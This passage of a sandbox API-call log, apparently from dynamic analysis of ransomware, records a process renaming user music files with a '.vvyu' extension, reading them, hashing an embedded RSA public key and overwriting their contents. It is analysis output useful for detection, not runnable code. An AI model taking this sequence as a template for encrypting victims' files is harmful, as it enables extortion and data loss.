lpMem=0x6ea898 | out: hHeap=0x6a0000) returned 1 [0189.950] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Music\\fUhvLY4JeAGwk\\Nfk529nzfIj1e1.mp3" (normalized: "c:\\users\\keecfmwgj\\music\\fuhvly4jeagwk\\nfk529nzfij1e1.mp3"), lpNewFileName="C:\\Users\\kEecfMwgj\\Music\\fUhvLY4JeAGwk\\Nfk529nzfIj1e1.mp3.vvyu" (normalized: "c:\\users\\keecfmwgj\\music\\fuhvly4jeagwk\\nfk529nzfij1e1.mp3.vvyu")) returned 1 [0189.951] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0189.951] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0189.951] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.954] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0189.954] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12307f40, ftCreationTime.dwHighDateTime=0x1d8a529, ftLastAccessTime.dwLowDateTime=0xca13c190, ftLastAccessTime.dwHighDateTime=0x1d8a587, ftLastWriteTime.dwLowDateTime=0xca13c190, ftLastWriteTime.dwHighDateTime=0x1d8a587, nFileSizeHigh=0x0, nFileSizeLow=0xee92, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="uI-Z5b.m4a", cAlternateFileName="")) returned 1 [0189.954] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0189.954] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x76) returned 0x723d10 [0189.955] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0189.955] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Music\\fUhvLY4JeAGwk\\uI-Z5b.m4a") returned=".m4a" [0189.955] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\fUhvLY4JeAGwk\\uI-Z5b.m4a" (normalized: "c:\\users\\keecfmwgj\\music\\fuhvly4jeagwk\\ui-z5b.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0189.955] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=61074) returned 1 [0189.955] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0189.958] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xee6c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0189.958] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0189.960] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0189.960] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0189.960] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0189.960] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0xee92, lpOverlapped=0x0) returned 1 [0189.961] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0189.961] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0189.961] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0189.961] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0189.961] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea700) returned 1 [0189.962] CryptCreateHash (in: hProv=0x6ea700, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0189.962] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0189.962] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0189.963] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0189.963] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0189.963] GetLastError () returned 0x0 [0189.963] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0189.963] CryptReleaseContext (hProv=0x6ea700, dwFlags=0x0) returned 1 [0189.963] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0189.963] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0189.963] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0189.963] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0189.963] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0189.963] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0189.963] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0189.963] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xee90) returned 0x2d45778 [0189.964] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0189.964] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0189.964] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0189.964] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0189.964] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0189.964] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0189.964] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d39498 [0189.964] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39a48 [0189.964] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d394e0 [0189.964] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39a60 [0189.964] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39a90 [0189.964] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39af0 [0189.964] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39aa8 [0189.964] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0189.965] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0189.965] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3bb48 [0189.965] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0189.965] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39a90 | out: hHeap=0x6a0000) returned 1 [0189.965] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39aa8 | out: hHeap=0x6a0000) returned 1 [0189.965] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39af0 | out: hHeap=0x6a0000) returned 1 [0189.965] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0189.965] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0189.965] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39af0 [0189.965] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37840 [0189.966] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39aa8 [0189.966] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0189.966] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d39a90 [0189.966] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37870 [0189.966] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x6d5c88 [0189.966] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b58 [0189.966] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0189.966] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0189.966] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0189.966] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446e8 [0189.966] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0189.966] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0189.966] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39aa8 | out: hHeap=0x6a0000) returned 1 [0189.966] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0189.966] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39a90 | out: hHeap=0x6a0000) returned 1 [0189.966] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0189.967] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0189.967] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39af0 | out: hHeap=0x6a0000) returned 1 [0189.967] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0189.967] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0189.968] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3bb48 | out: hHeap=0x6a0000) returned 1 [0189.968] GetCurrentThreadId () returned 0x264 [0189.968] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0189.968] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d441b0 [0189.968] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0189.968] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0189.968] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0189.968] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0189.968] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0189.968] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0189.968] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0189.968] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0189.968] GetCurrentThreadId () returned 0x264 [0189.968] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0189.969] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0189.969] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x74ad40 [0189.969] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0189.969] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0189.969] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0189.970] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0189.970] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0189.970] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0189.970] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0189.970] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c829b0 [0189.970] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0189.970] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c31700 [0189.970] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0189.970] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39af0 [0189.970] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0189.970] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0189.970] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0189.970] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0189.971] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0189.971] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0189.971] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0189.971] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0189.971] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39a90 [0189.971] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0189.971] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0189.971] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0189.971] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0189.971] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0189.971] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0189.971] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0189.971] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39aa8 [0189.971] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0189.971] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0189.971] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0189.971] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39a78 [0189.971] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0189.971] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39b08 [0189.971] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0189.971] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378d0 [0189.971] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0189.971] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39ad8 [0189.972] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0189.972] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39ac0 [0189.972] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0189.972] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39b20 [0189.972] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39ac0 | out: hHeap=0x6a0000) returned 1 [0189.972] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39ac0 [0189.972] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39ad8 | out: hHeap=0x6a0000) returned 1 [0189.972] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0189.972] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0189.972] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0189.972] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0189.972] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27b58 [0189.972] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39a90 | out: hHeap=0x6a0000) returned 1 [0189.972] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39a90 [0189.972] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0189.972] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d3b678 [0189.972] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39af0 | out: hHeap=0x6a0000) returned 1 [0189.972] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0189.972] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39b20 | out: hHeap=0x6a0000) returned 1 [0189.972] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2fc90 [0189.972] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0189.972] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c03ca0 [0189.972] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0189.973] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0189.973] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39a90 | out: hHeap=0x6a0000) returned 1 [0189.973] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fea8 [0189.973] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0189.973] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2d300b0 [0189.973] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0189.974] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0189.974] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0189.974] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d300b0 | out: hHeap=0x6a0000) returned 1 [0189.974] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0189.975] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0189.975] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0189.975] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fea8 | out: hHeap=0x6a0000) returned 1 [0189.976] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0189.976] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0189.976] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39ac0 | out: hHeap=0x6a0000) returned 1 [0189.976] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0189.976] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39b08 | out: hHeap=0x6a0000) returned 1 [0189.976] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0189.976] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39aa8 | out: hHeap=0x6a0000) returned 1 [0189.976] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39a78 | out: hHeap=0x6a0000) returned 1 [0189.976] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0189.976] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0189.977] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0189.977] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39a60 | out: hHeap=0x6a0000) returned 1 [0189.977] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d394e0 | out: hHeap=0x6a0000) returned 1 [0189.978] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b678 | out: hHeap=0x6a0000) returned 1 [0189.978] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0189.978] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0189.979] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0189.979] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0189.979] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0189.979] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0189.979] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0189.980] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0189.980] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0189.980] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0189.981] WriteFile (in: hFile=0x584, lpBuffer=0x2d45778*, nNumberOfBytesToWrite=0xee8d, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d45778*, lpNumberOfBytesWritten=0x30ffb14*=0xee8d, lpOverlapped=0x0) returned 1 [0189.982] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d45778 | out: hHeap=0x6a0000) returned 1 [0189.982] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xee92, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0189.983] WriteFile (in: hFile=0x584, lpBuffer=0x6d5c88*, nNumberOfBytesToWrite=0x100, 